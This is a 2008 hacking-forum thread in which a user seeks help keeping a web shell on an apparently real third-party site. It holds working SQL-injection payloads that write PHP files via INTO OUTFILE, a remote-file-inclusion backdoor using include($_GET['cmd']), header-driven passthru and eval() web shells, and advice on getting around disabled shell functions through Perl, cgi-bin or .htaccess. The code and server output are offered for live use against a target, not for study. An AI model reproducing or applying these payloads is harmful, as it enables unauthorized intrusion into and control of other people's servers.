 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
HTTP 403 [ RFI ] |
 |
 Posted: Wed Feb 13, 2008 4:57 pm |
 |
|
| kr0k0 |
| Advanced user |
 |
|
| Joined: Jan 26, 2008 |
| Posts: 128 |
|
|
|
 |
|
 |
|
Help Please 
i put : 1-
| Code: | | UNION+ALL+SELECT+'<?php+phpinfo();+?>',2,3,4+INTO+OUTFILE+'/home/www/web/1/test.php'/* |
work , i see PHPINFO
2-
| Code: | | UNION+ALL+SELECT+'<?include($_GET["cmd"]);?>',2,3,4+INTO+OUTFILE+'/home/www/web/1/test.php'/* |
whene i go to : http://www.site.com/test.php
1
Warning: main() [function.include]: Failed opening '' for inclusion (include_path='.:/opt/php/lib/php') in /home/www/b76e6d18e284b62821382d5fdbbd/web/forum/1.php on line 1
3 4
Whene i go to http://www.yahoo.com , it work  , but whene i inject a Shell didnt work 
http://www.site.com/test.php?cmd=http://www.yahoo.com
Work 100%
http://www.site.com/test.php?cmd=http://shell.txt?
HTTP 403 
tell me 1 Methode Please ; or auter SHELL or ........  PLEASE WARAXE
and Thankx for Help |
|
|
|
|
|
|
|
|
| Posted: Wed Feb 13, 2008 7:59 pm |
|
|
| pexli |
| Valuable expert |
 |
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
Try like this
<?include($_GET[cmd]);?>
P.S.If admins are not lamers your shell and this sql inj will live couple hrs or 1 day |
|
|
|
|
| Posted: Thu Feb 14, 2008 5:59 am |
|
|
| kr0k0 |
| Advanced user |
|
|
| Joined: Jan 26, 2008 |
| Posts: 128 |
|
|
|
|
|
|
|
| koko wrote: | Try like this
<?include($_GET[cmd]);?>
P.S.If admins are not lamers your shell and this sql inj will live couple hrs or 1 day |
i try it not work |
|
|
|
|
| Posted: Thu Feb 14, 2008 6:37 am |
|
|
| pexli |
| Valuable expert |
|
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
You know how to work with headers shell's?Something like:
| Code: | | <?php passthru(getenv("HTTP_HaXoReD"));?> |
|
|
|
|
|
| Posted: Thu Feb 14, 2008 10:30 am |
|
|
| kr0k0 |
| Advanced user |
|
|
| Joined: Jan 26, 2008 |
| Posts: 128 |
|
|
|
|
|
|
|
| koko wrote: | You know how to work with headers shell's?Something like:
| Code: | | <?php passthru(getenv("HTTP_HaXoReD"));?> |
|
Warning: passthru() has been disabled for security reasons in /home/www/site.com/web/forum/mkportal/blog/file.php on line 1 |
|
|
|
|
| Posted: Thu Feb 14, 2008 11:10 am |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| kr0k0 wrote: | | koko wrote: | You know how to work with headers shell's?Something like:
| Code: | | <?php passthru(getenv("HTTP_HaXoReD"));?> |
|
Warning: passthru() has been disabled for security reasons in /home/www/site.com/web/forum/mkportal/blog/file.php on line 1 |
Look at phpinfo! php version? safe_mode? disable_functions? Is php as Apache module or CGI? open_basedir? Is .htaccess usable? perl support? python support? |
|
|
|
|
| Posted: Thu Feb 14, 2008 12:43 pm |
|
|
| kr0k0 |
| Advanced user |
|
|
| Joined: Jan 26, 2008 |
| Posts: 128 |
|
|
|
|
|
|
|
safe_mode : Off
disable_functions :
set_time_limit,passthru,exec,system,popen,shell_exec,proc_open set_time_limit,passthru,exec,system,popen,shell_exec,proc_open
open_basedir : /home/www/site.com/:/tmp no value |
|
|
|
|
| Posted: Thu Feb 14, 2008 3:29 pm |
|
|
| pexli |
| Valuable expert |
|
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
| A'm ask you one more time you know how to work with headers? |
|
|
|
|
| Posted: Thu Feb 14, 2008 3:50 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| kr0k0 wrote: | safe_mode : Off
disable_functions :
set_time_limit,passthru,exec,system,popen,shell_exec,proc_open set_time_limit,passthru,exec,system,popen,shell_exec,proc_open
open_basedir : /home/www/site.com/:/tmp no value |
What version is php? |
|
|
|
|
| Posted: Fri Feb 15, 2008 12:13 pm |
|
|
| kr0k0 |
| Advanced user |
|
|
| Joined: Jan 26, 2008 |
| Posts: 128 |
|
|
|
|
|
|
|
| waraxe wrote: | | kr0k0 wrote: | safe_mode : Off
disable_functions :
set_time_limit,passthru,exec,system,popen,shell_exec,proc_open set_time_limit,passthru,exec,system,popen,shell_exec,proc_open
open_basedir : /home/www/site.com/:/tmp no value |
What version is php? |
PHP Version 4.4.7 |
|
|
|
|
| Posted: Fri Feb 15, 2008 1:07 pm |
|
|
| pexli |
| Valuable expert |
|
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
| eval() is not disable use it. |
|
|
|
|
| Posted: Fri Feb 15, 2008 1:13 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| koko wrote: | | eval() is not disable use it. |
He allready has php access. So no use of eval(). But shell access is needed. And shell functions are disabled. And ... php version is not old. ...
Perl possibilities? Can you write to cgi-bin? Probably not ... If you can manage to write and execute perl script, then shell access may be possible. Try to write .htaccess file and test for it's functionality - is it usable? |
|
|
|
|
| Posted: Fri Feb 15, 2008 2:01 pm |
|
|
| pexli |
| Valuable expert |
|
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
waraxe ему нужен шел но сам видиш что большинство функции disable.Но eval() не в списке.А почему не изпользовать его.Примерно.
| Code: | <?php
$d=@getenv('HTTP_Fucked');
if($d) {@eval($d);exit;}
?> |
|
|
|
|
|
www.waraxe.us Forum Index -> All other security holes
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 59
Members: 0
Total: 59
